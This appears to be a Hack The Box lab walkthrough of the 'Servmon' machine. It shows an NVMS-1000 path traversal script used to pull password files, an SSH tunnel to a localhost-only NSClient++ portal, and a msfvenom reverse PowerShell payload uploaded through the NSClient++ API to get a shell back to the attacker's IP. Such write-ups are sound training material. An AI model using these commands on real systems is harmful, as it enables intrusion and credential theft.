[hackthebox]Servmon

Introduction

Servmon is a new machine which receives very low ratings because a lot of people are complaining about the nsclient++ web portal being “unstable”, well this can be circumvented by using chromium browser, if you are using kali linux as root then run chromium --no-sandbox, you cannot login to this portal remotely because it is restricted only to localhost but this can be circumvented by using ssh tunnel.

nmap scan

nmap -sC -sV -oN servmon -vvv 10.10.10.184
In summary these are the ports:

PORT     STATE SERVICE       REASON          VERSION
21/tcp   open  ftp           syn-ack ttl 127 Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_01-18-20  12:05PM                 Users
| ftp-syst:
|_  SYST: Windows_NT
22/tcp   open  ssh           syn-ack ttl 127 OpenSSH for_Windows_7.7 (protocol 2.0)

80/tcp   open  http          syn-ack ttl 127

135/tcp  open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds? syn-ack ttl 127
5666/tcp open  tcpwrapped    syn-ack ttl 127
6699/tcp open  napster?      syn-ack ttl 127
8443/tcp open  ssl/https-alt syn-ack ttl 127

Host script results:
|_clock-skew: 2m30s
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 40676/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 20065/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 54993/udp): CLEAN (Failed to receive data)
|   Check 4 (port 62863/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-04-15T04:42:56
|_  start_date: N/A

I have tested the 139 and 445 and did web fuzzing on http://10.10.10.184, i cannot find entry point for smb vulnerability, web fuzzing also did not enumerate any useful directory:

-----------------
DIRB v2.22
By The Dark Raver
-----------------

OUTPUT_FILE: dirb_result
START_TIME: Thu Apr 16 11:10:01 2020
URL_BASE: http://10.10.10.184/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://10.10.10.184/ ----
+ http://10.10.10.184/favicon.ico (CODE:200|SIZE:1150)
+ http://10.10.10.184/index.htm (CODE:200|SIZE:340)

-----------------
END_TIME: Thu Apr 16 11:38:15 2020
DOWNLOADED: 4612 - FOUND: 2

NVMS-1000 web portal

servmon4
Searching the web with duckduckgo I have found that there is a path traversal vulnerability.

On searchsploit this exploit can be found:
servmon5

Read the exploit doc you will see a poc:
POC:


curl http://%5BIP Address]/../../../mnt/mtd/config/config.dat 2>/dev/null | strings

I tested this with msfconsole and files can be downloaded.
servmon6
servmon7

nsclient++ configuration file can be downloaded from this path /program+files/nsclient%2B%2B/nsclient.ini you need to understand the filepath is an uri hence the “/” and space has to be encoded in url.
servmon8

servmon9

In the nsclient.ini a plaintext password of nsclient is found, this is used when rooting the machine, so first of all we need to find the user flag first.

User’s flag hint

FTP to 10.10.10.184, this ftp server allows anonymous login.
servmon10
Then enumerate the directory once connection established.
servmon11
Download the files in respective directories to find out what are they.
servmon12

Looking at Confidential.txt, I found out where to look for passwords.
servmon13

Read the Notes to do.txt, I understood that nsclient cannot be access remotely, this coincides with the nsclient.ini, which only allows 127.0.0.1.
servmon14

Looking at nsclient.ini
servmon15

Download password.txt

I will be using the same path traversal exploit of nvms-1000 to help me download the password.txt file.
I could use the same exploit in msfconsole to do it, but i have decided to write my python script to help me download the file.

import requests

# You will need to encode the ../ to url in order for the web to understand it 😉
# I have fuzzed it until it spits out the nsclient.ini hahaha
trasversal = "..%2F"
web = "http"
port = 80
outfile = "passwords.txt"
# on msfconsole use the auxiliary/scanner/http/tvt_nvms_traversal
# set filepath to /Users/Nathan/Desktop/Passwords.txt
filepath = "Users%2FNathan%2FDesktop%2FPasswords.txt"
uri = f"{web}://10.10.10.184/{trasversal * 3}{filepath}"
print(uri)
response = requests.get(uri, verify=False)
if response.status_code == 200:
with open(f"/root/htb/servmon/{outfile}", "w") as file:
file.write(response.text)

There are several passwords I tested each password for both nathan and nadine with ssh and finally I got connected to nadine with this password: L1k3B1gBut7s@W0rk

Get user’s flag

ssh nadine@10.10.10.184 with the password found.
servmon17

Privilege escalation

As only 127.0.0.1 is allowed to access nsclient++ web portal, I need ssh tunnel to bypass this restriction. Also the webportal may not displayed properly in firefox, I recommend you use chromium which is much better.

ssh -L 8080:127.0.0.1:8443 nadine@10.10.10.184
This is the command line to set up ssh tunnel, what this means is that you are setting up a ssh proxy which is listened by your attacking machine which is 127.0.0.1:8080, the traffic is sent over to 10.10.10.184 which in turn sends back to the localhost of the remote machine at port 8443.

This is how I use chromium --no-sandbox to open the nsclient web ui and login with the password discovered from nsclient.ini.
servmon18
this is the nsclient password discovered ew2x6SsGTxjRwXOT
There is a vulnerability with nsclient which you can use searchsploit nsclient

servmon19
You can read the instruction, the pre-requisites are to enable CheckExternalScripts and Scheduler, you can check this in the web ui to ensure these two modules are enabled.
servmon20servmon22

I have tried to add my own scripts in the web ui but i got problem configuring them so I turned to use nsclient api, use the add script api.
I tried to upload the nc.exe but it was deleted I suspect it was quarantined by the Windows Defender, and also I tried to upload a reverse shell powershell script it was also deleted. But there is a solution I use msfvenom and created a batch file that triggers a powershell script within the batch file.
msfvenom -p cmd/windows/reverse_powershell lhost=10.10.14.20 lport=4444 -o evilps.bat

servmon23

Use this curl command to upload the batch from my attacking machine to servmon.
curl -s -k -u admin -X PUT https://localhost:8080/api/v1/scripts/ext/scripts/evilps.bat --data-binary @evilps.bat
notice the address is https://localhost:8080 which is through the ssh tunnel.
servmon24

Set up the multi handler in msfconsole with the same payload i used for msfvenom.
servmon25

Then run the command in nsclient web ui console.
servmon26

servmon27

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s